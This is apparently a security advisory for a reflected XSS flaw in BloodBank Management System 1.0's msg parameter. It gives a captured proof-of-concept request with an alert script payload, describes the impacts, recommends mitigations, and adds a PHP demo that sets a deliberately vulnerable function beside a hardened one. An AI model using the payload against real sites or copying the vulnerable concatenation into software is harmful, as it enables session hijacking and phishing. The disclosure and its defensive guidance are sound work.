@higordiego
Created October 25, 2024 21:25
Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: Cross-Site Scripting (XSS)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • Path: /bloodrequest.php?msg=

Vulnerability Description:

A reflected Cross-Site Scripting (XSS) vulnerability exists in the blood request page of the BloodBank Management System. The value of the msg query parameter is written into the HTML response without output encoding, so an attacker can craft a link to /bloodrequest.php whose msg value contains HTML and JavaScript. The script executes in the browser of any user who follows the link, within the origin of the application.

Because the injected script runs in the application's origin, successful exploitation lets the attacker perform actions as the victim, read content shown on the page, steal the session cookie if it is not marked HttpOnly, or redirect the victim to a phishing site. The attack requires a victim to open an attacker-supplied link, typically delivered by e-mail, chat, or a page the attacker controls.


Proof of Concept (PoC):

Below is the GET request used to demonstrate the issue, captured against a local instance on localhost:8080. The URL-encoded msg value decodes to <script>alert("xss")</script> have logged in.; the Referer shows the page was reached from login.php.


GET /bloodrequest.php?msg=%3cscript%3ealert(%22xss%22)%3c%2fscript%3e%20have%20logged%20in. HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

The response body contains the msg value verbatim, so the following markup reaches the browser unencoded:

<script>alert("xss")</script>

The browser executes it and shows an alert dialog, which is sufficient to demonstrate arbitrary script execution; a real attack would replace the alert with a less conspicuous payload.


[Screenshot not reproduced]

Impact:

  • Session Hijacking: If the PHPSESSID cookie is not marked HttpOnly, injected script can read document.cookie and send it to the attacker, who can then impersonate the user. Even with HttpOnly set, the script can issue requests as the victim for as long as the page is open.
  • Phishing Attacks: Injected script can rewrite the page (for example the login form) or redirect the victim to an attacker-controlled site to capture credentials.
  • Malware Spread: Injected script can load further attacker-controlled resources or prompt downloads in the victim's browser.
  • Data Manipulation: Attackers can modify the content displayed to users and submit forms on the victim's behalf.
  • Reputational Damage: Users may lose trust in the system due to malicious behavior.

Mitigation Recommendations:

  1. Output Encoding: Encode the msg value at the point where it is written into HTML, for example with PHP's htmlspecialchars() using ENT_QUOTES and the page's charset, so that <, >, &, " and ' become entities. This is the primary fix; encoding must match the context (HTML body, attribute, JavaScript, URL) in which the value is placed.
  2. Input Validation: Validate msg against what the application actually expects (bounded length, no control characters). Treat this as defence in depth, not as a replacement for output encoding; blocklisting strings such as <script> is easy to bypass.
  3. Use HTTP Headers: Send a Content-Security-Policy whose script-src does not include 'unsafe-inline', so the injected inline script is blocked even if an encoding bug slips through. This requires moving the application's own inline scripts to files or giving them nonces.
  4. Templating: Build HTML with a template engine that escapes by default rather than by concatenating strings with user-provided data. (Prepared statements protect against SQL injection, not XSS.)
  5. Cookie Flags: Set HttpOnly (and Secure when served over HTTPS) on the session cookie so that script cannot read PHPSESSID; this limits the session-hijacking impact but does not remove the XSS itself.
  6. Security Testing: Perform regular penetration testing to identify and fix XSS vulnerabilities early.
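The fix described in items 1 through 5, as an added example that is not the BloodBank Management System's own code: a minimal PHP page that reproduces the vulnerable pattern beside a hardened equivalent. Only the /bloodrequest.php path and the msg parameter name come from the advisory; the function names, the surrounding markup, the validation policy and the header values are assumptions made for this demonstration.

```php
<?php
// Added example: illustrative PHP, not the BloodBank Management System's code.
// Only the /bloodrequest.php path and the `msg` parameter come from the
// advisory; function names, markup, validation policy and header values are
// assumptions made for this demonstration.
declare(strict_types=1);

// Vulnerable pattern: the query value is concatenated straight into the HTML,
// so ?msg=<script>alert("xss")</script> is executed by the browser.
function render_msg_vulnerable(array $get): string
{
    $msg = $get['msg'] ?? '';
    return '<div class="alert">' . $msg . '</div>';
}

// Input validation (defence in depth): reject control characters and
// over-long values (byte length). Deliberately does NOT try to strip
// "<script>"; neutralising markup is the job of output encoding, and
// blocklists are easy to bypass.
function validate_msg(string $msg): bool
{
    return strlen($msg) <= 200 && !preg_match('/[\x00-\x1F\x7F]/', $msg);
}

// Hardened version: every character with meaning in HTML is encoded at the
// point of output, so the payload is rendered as text and never executed.
function render_msg_safe(array $get): string
{
    $raw = $get['msg'] ?? '';
    // ?msg[]=x arrives as an array; treat anything that is not a string as
    // empty rather than letting htmlspecialchars() throw a TypeError.
    $msg = is_string($raw) ? $raw : '';
    if (!validate_msg($msg)) {
        $msg = '';
    }
    $encoded = htmlspecialchars($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="alert">' . $encoded . '</div>';
}

// Response headers that contain the damage if an encoding bug slips through.
// Must run before any output is sent.
function send_hardening_headers(): void
{
    // No 'unsafe-inline' in script-src: the injected inline <script> is
    // blocked. If the application relies on its own inline scripts, they
    // need nonces or must move to separate files.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
    header('X-Content-Type-Options: nosniff');
}

// HttpOnly keeps document.cookie from exposing PHPSESSID, which blunts the
// cookie-theft variant of session hijacking; Secure requires HTTPS.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

if (PHP_SAPI === 'cli') {
    // Offline demonstration with the advisory's PoC value (constructed input).
    $poc = ['msg' => '<script>alert("xss")</script> have logged in.'];
    echo 'vulnerable: ' . render_msg_vulnerable($poc) . "\n";
    echo 'hardened:   ' . render_msg_safe($poc) . "\n";
} else {
    send_hardening_headers();
    start_hardened_session();
    echo '<!doctype html><meta charset="utf-8">' . render_msg_safe($_GET);
}
```

Run with `php bloodrequest_hardened.php` to see both renderings side by side: the vulnerable function returns the script tag intact, while the hardened one returns it as &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;, which the browser displays as text. The validation step is intentionally loose, because the encoder, not the validator, is what makes the output safe; the CSP and cookie flags are independent layers that reduce impact if a later change reintroduces an unencoded output.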
